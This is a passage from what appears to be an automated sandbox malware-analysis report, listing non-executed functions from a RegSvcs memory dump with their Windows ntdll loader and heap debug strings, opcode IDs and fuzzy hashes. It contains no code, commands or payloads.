                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 974242ff3d6fa2d99615895bea71d4f4049b8cc9d34f971d8df2c616c01802d7
                                                                          • Instruction ID: fb3b22e4158c15f7bbc6293f715bba45e944cc8fb42b233dc1cf9b65c437e59e
                                                                          • Opcode Fuzzy Hash: 974242ff3d6fa2d99615895bea71d4f4049b8cc9d34f971d8df2c616c01802d7
                                                                          • Instruction Fuzzy Hash: 47B02B328014C0C5DA01E360460870B3A0077C0300F19C021E2030B41F4738C0C1F271

                                                                          Non-executed Functions

                                                                          Function 01562349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          • Opcode ID: b31496073c2ee9723eb51e8f25d0dfac54def452da90545d5189e8e2f0ba4434
                                                                          • Instruction ID: 4f676e05b4d94d1876246b72b51cca3b417b1f2b0473170cdb84efc795bc0016
                                                                          • Opcode Fuzzy Hash: b31496073c2ee9723eb51e8f25d0dfac54def452da90545d5189e8e2f0ba4434
                                                                          • Instruction Fuzzy Hash: 39927071608342AFE721DF19C880B6BB7E8BB94754F14492DFA94DF2A1D770E844CB92
                                                                          Function 01518620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • double initialized or corrupted critical section, xrefs: 01555508
                                                                          • corrupted critical section, xrefs: 015554C2
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0155540A, 01555496, 01555519
                                                                          • Address of the debug info found in the active list., xrefs: 015554AE, 015554FA
                                                                          • Critical section address, xrefs: 01555425, 015554BC, 01555534
                                                                          • Critical section address., xrefs: 01555502
                                                                          • Critical section debug info address, xrefs: 0155541F, 0155552E
                                                                          • 8, xrefs: 015552E3
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015554E2
                                                                          • Thread identifier, xrefs: 0155553A
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015554CE
                                                                          • undeleted critical section in freed memory, xrefs: 0155542B
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01555543
                                                                          • Invalid debug info address of this critical section, xrefs: 015554B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          • Opcode ID: 9087095708e47c20112047e0adcc2e49e113641dee130b44e204fa6a5a5ca026
                                                                          • Instruction ID: 302a28d068a7d2f0b2ff678ee464d6f9c6b8ea6fc52e315ca7198996216713a1
                                                                          • Opcode Fuzzy Hash: 9087095708e47c20112047e0adcc2e49e113641dee130b44e204fa6a5a5ca026
                                                                          • Instruction Fuzzy Hash: D981B0B4A40359EFDB60CF99C844BAEBBF5BB48B04F20411EF905BB261E375A945CB50
                                                                          Function 015129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01552506
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015522E4
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01552498
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01552412
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01552409
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015525EB
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0155261F
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01552624
                                                                          • @, xrefs: 0155259B
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015524C0
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01552602
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          • API String ID: 0-4009184096
                                                                          • Opcode ID: 74bf8c17db1d58dbeeab2937d46883c45fea7e3f05f42fd7dd786b1abeaa622a
                                                                          • Instruction ID: 00731181a1c70f1d1b399d0dd91375986de3dc98c2701b7c65c01e00972ba5ef
                                                                          • Opcode Fuzzy Hash: 74bf8c17db1d58dbeeab2937d46883c45fea7e3f05f42fd7dd786b1abeaa622a
                                                                          • Instruction Fuzzy Hash: 790281B1D00229DBEB61DB54CC90B9DB7B8BF54704F5041DAEB09AB241EB309E84CF69
                                                                          Function 01588B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                          • API String ID: 0-2515994595
                                                                          • Opcode ID: d5c73f9d41f15e43384768a29ec66a67759169cec2c07806e9d0d397d80921ea
                                                                          • Instruction ID: e4c3e17ba958fe4802726db6e5e50b5d3cfa2eee854348fd87354fdecaedf11c
                                                                          • Opcode Fuzzy Hash: d5c73f9d41f15e43384768a29ec66a67759169cec2c07806e9d0d397d80921ea
                                                                          • Instruction Fuzzy Hash: E651CE716053129BD325EF18C884BABBBE8FFD4240F54491EE958DB294E770D608CBA2
                                                                          Function 01590274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 0-1700792311
                                                                          • Opcode ID: e0409489bc07bd82fec117d69c8ff61ee5cb23e480d881a2141665641e6f6883
                                                                          • Instruction ID: 3c5412f528084bfa67f555f44feb0513b0463452d356d3c75f68e2114231fb4e
                                                                          • Opcode Fuzzy Hash: e0409489bc07bd82fec117d69c8ff61ee5cb23e480d881a2141665641e6f6883
                                                                          • Instruction Fuzzy Hash: C9D1EC31500282DFDF22DF69C450AADBBF5FF5A710F19884EE9499F6A2C7349881CB52
                                                                          Function 015689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01568A3D
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01568A67
                                                                          • VerifierDebug, xrefs: 01568CA5
                                                                          • VerifierFlags, xrefs: 01568C50
                                                                          • VerifierDlls, xrefs: 01568CBD
                                                                          • HandleTraces, xrefs: 01568C8F
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01568B8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          • API String ID: 0-3223716464
                                                                          • Opcode ID: c06bbf8b28eb2fd50091f1f27c7489f43e8e92621099f2d57a4462a1937a8906
                                                                          • Instruction ID: e689efda8a17195182eb8fe9fce507f42a8f257d561ae9e9016d779124e4c13f
                                                                          • Opcode Fuzzy Hash: c06bbf8b28eb2fd50091f1f27c7489f43e8e92621099f2d57a4462a1937a8906
                                                                          • Instruction Fuzzy Hash: 17912371606712AFE732DF68C890B1A7BE8BBA4B14F45085DFA406F250D7709C08CBE1
                                                                          Function 014EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          • API String ID: 0-1109411897
                                                                          • Opcode ID: bfe79e0b8674a73b05f8933fe1b53277b314f2bd4105cf28b7b4aa032736b036
                                                                          • Instruction ID: 3f22317d013178f5cbdf13e6037673f7e00dba0e351ce3f6002323170e2b346f
                                                                          • Opcode Fuzzy Hash: bfe79e0b8674a73b05f8933fe1b53277b314f2bd4105cf28b7b4aa032736b036
                                                                          • Instruction Fuzzy Hash: F1A23B74A0562A8FDB64CF19C8987ADBBB5BF45305F1442EAD50DAB3A0DB319E85CF00
                                                                          Function 015163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-792281065
                                                                          • Opcode ID: dfab571478fae604be52c1d8ea5a8c020c11df9242a9d78d9cea7dc143f709e3
                                                                          • Instruction ID: 528ae81700534a91d9453b2346ddc41972c7c606a26e2203c93da6536456dc88
                                                                          • Opcode Fuzzy Hash: dfab571478fae604be52c1d8ea5a8c020c11df9242a9d78d9cea7dc143f709e3
                                                                          • Instruction Fuzzy Hash: 84918971B413229BEB76DF18D894BAE7BB1BF50B14F11002EE9106F295E7F09841C7A1
                                                                          Function 014D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • apphelp.dll, xrefs: 014D6496
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01539A01
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01539A11, 01539A3A
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01539A2A
                                                                          • LdrpInitShimEngine, xrefs: 015399F4, 01539A07, 01539A30
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015399ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-204845295
                                                                          • Opcode ID: ee1aa280b878c9073fa165967abc00ee40111ce2607e069e94494ae53600d1ea
                                                                          • Instruction ID: 20a0b7e539fa6a4ae28a127f1c875aaa41df79bd9dea733106b2126048f8e49d
                                                                          • Opcode Fuzzy Hash: ee1aa280b878c9073fa165967abc00ee40111ce2607e069e94494ae53600d1ea
                                                                          • Instruction Fuzzy Hash: 1C51C1B12083019FEB20DF25D851B9B77E4FBC4744F52091EE5959B260D6B0E945CB92
                                                                          Function 01512674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0155219F
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01552160, 0155219A, 015521BA
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01552180
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01552178
                                                                          • SXS: %s() passed the empty activation context, xrefs: 01552165
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015521BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          • API String ID: 0-861424205
                                                                          • Opcode ID: 0ff703008404f51bb52e3185beb0227a9ccc54452adfccd07ba56863d7c539bb
                                                                          • Instruction ID: daef087d8d3c4c9500632400dd99eba854bd6a526e742ecb360ace6d4278d53c
                                                                          • Opcode Fuzzy Hash: 0ff703008404f51bb52e3185beb0227a9ccc54452adfccd07ba56863d7c539bb
                                                                          • Instruction Fuzzy Hash: 6231053AF40215B7F7228A9A9C51F5F7B68FBA4E50F25005EBB04BF154D2709A00CBA0
                                                                          Function 0151C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 0151C6C4
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01558170
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 015581E5
                                                                          • LdrpInitializeImportRedirection, xrefs: 01558177, 015581EB
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0151C6C3
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01558181, 015581F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-475462383
                                                                          • Opcode ID: a4440b4c1b95cb9761637b9086f81c673117c33968e5cf14acedc71c27308825
                                                                          • Instruction ID: ca459c076e617bd6f8131ecd2050b48c72251f70c03109fe23a4d3be0d47576b
                                                                          • Opcode Fuzzy Hash: a4440b4c1b95cb9761637b9086f81c673117c33968e5cf14acedc71c27308825
                                                                          • Instruction Fuzzy Hash: F931F3716447129BD325EF29D846E2A77A4FFD4B10F05091DF980AF2A1E660ED04C7A2
                                                                          Function 0152096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 01522DF0: LdrInitializeThunk.NTDLL ref: 01522DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 1404860816-0
                                                                          • Opcode ID: 33b562586484027023e3ef88eeaa09f4036478bd65456757c02d20cff296af54
                                                                          • Instruction ID: 2df5ead7e2165a8399a6b05cc1d86c456c66445a2f61709e6a7c76eadee0755d
                                                                          • Opcode Fuzzy Hash: 33b562586484027023e3ef88eeaa09f4036478bd65456757c02d20cff296af54
                                                                          • Instruction Fuzzy Hash: 1B427C76900716DFDB61CF28C880BAAB7F5BF45314F0445AAE989EF281D770A984CF60
                                                                          Function 014EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          • API String ID: 0-379654539
                                                                          • Opcode ID: c2975b8bc0998c2b79efbae9cca2fab38f5401fecf4d7055798353a9a5ac29b1
                                                                          • Instruction ID: 8a3290a21ab3fbf1637dbf352b9e5143ecbae581c8485f6f61321680bd9885b8
                                                                          • Opcode Fuzzy Hash: c2975b8bc0998c2b79efbae9cca2fab38f5401fecf4d7055798353a9a5ac29b1
                                                                          • Instruction Fuzzy Hash: 50C1BB75508382CFD711CF68C148B6AB7E4BF84309F14896EF9958B361E734C94ACB56
                                                                          Function 01518402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 01518422
                                                                          • @, xrefs: 01518591
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01518421
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0151855E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1918872054
                                                                          • Opcode ID: 7c8c21c07bea975c9c356f2948e4804af69b8e965e263ca3abfd92d9ec97aa0e
                                                                          • Instruction ID: 5e8cd604745fc10470fca8f3eef85802f891e271dee9cddc748c878ea9a09b62
                                                                          • Opcode Fuzzy Hash: 7c8c21c07bea975c9c356f2948e4804af69b8e965e263ca3abfd92d9ec97aa0e
                                                                          • Instruction Fuzzy Hash: B091AD71518346AFE722DF65CC90FAFBAE8FB94744F40092EFA849A154E734D904CB62
                                                                          Function 0151273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015521D9, 015522B1
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015522B6
                                                                          • SXS: %s() passed the empty activation context, xrefs: 015521DE
                                                                          • .Local, xrefs: 015128D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          • API String ID: 0-1239276146
                                                                          • Opcode ID: 536a48fe740fc182e52ff56a3bb8f61beae9dafb43a02dc4bb94746cb53b7e0f
                                                                          • Instruction ID: ba8ef7e9e329381ac8287032ad19a5668c67ada2ad97f6781e5ddd7c24e3be97
                                                                          • Opcode Fuzzy Hash: 536a48fe740fc182e52ff56a3bb8f61beae9dafb43a02dc4bb94746cb53b7e0f
                                                                          • Instruction Fuzzy Hash: 3FA1CF3590022ADFEB25CF69CC84BA9B7B1BF58354F2545EAD908AB255D7309EC0CF90
                                                                          Function 01514AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlDeactivateActivationContext, xrefs: 01553425, 01553432, 01553451
                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0155342A
                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01553456
                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01553437
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                          • API String ID: 0-1245972979
                                                                          • Opcode ID: aa79a4b1cb269acaf9b3778d14cac69824384658cce1de08c1863882d6889a17
                                                                          • Instruction ID: 4aa503688c2aac048e3854bc6c74f01eea6750d21d549b8d3b554e79968bcc74
                                                                          • Opcode Fuzzy Hash: aa79a4b1cb269acaf9b3778d14cac69824384658cce1de08c1863882d6889a17
                                                                          • Instruction Fuzzy Hash: F16112366007129BEB638F1DC855B2EBBE5BF90B50F15852EE8599F250D770E801CB91
                                                                          Function 014E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015410AE
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01541028
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0154106B
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01540FE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          • API String ID: 0-1468400865
                                                                          • Opcode ID: efe08b2954e2d34bcfbeeb238c0874583eb5c24a00263a595829d9d5b46ff729
                                                                          • Instruction ID: 5ce928a71a600dc9e8ede886c1f15dea47246ec81779b77d099ef3167595e0a0
                                                                          • Opcode Fuzzy Hash: efe08b2954e2d34bcfbeeb238c0874583eb5c24a00263a595829d9d5b46ff729
                                                                          • Instruction Fuzzy Hash: 1271DF71A04316AFCB20DF18C885B9B7BE8AFA5764F10046AF9488F296D734D589CBD1
                                                                          Function 0150245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • apphelp.dll, xrefs: 01502462
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0154A9A2
                                                                          • LdrpDynamicShimModule, xrefs: 0154A998
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0154A992
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-176724104
                                                                          • Opcode ID: c23faae4cffe17ded57e34d0fe12e6d377f2ed1e577fa0f8b7e0f90e5010624b
                                                                          • Instruction ID: 0f3e45e374bd46749665674c53a055f958f300bd6b054a5a0cbeaed97001837d
                                                                          • Opcode Fuzzy Hash: c23faae4cffe17ded57e34d0fe12e6d377f2ed1e577fa0f8b7e0f90e5010624b
                                                                          • Instruction Fuzzy Hash: 2C317975681202ABDB719FAEC885E6EB7F4FB80B08F17001EE9226F255C7B05946D780
                                                                          Function 014F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                          Download Yara Rule
                                                                          Strings
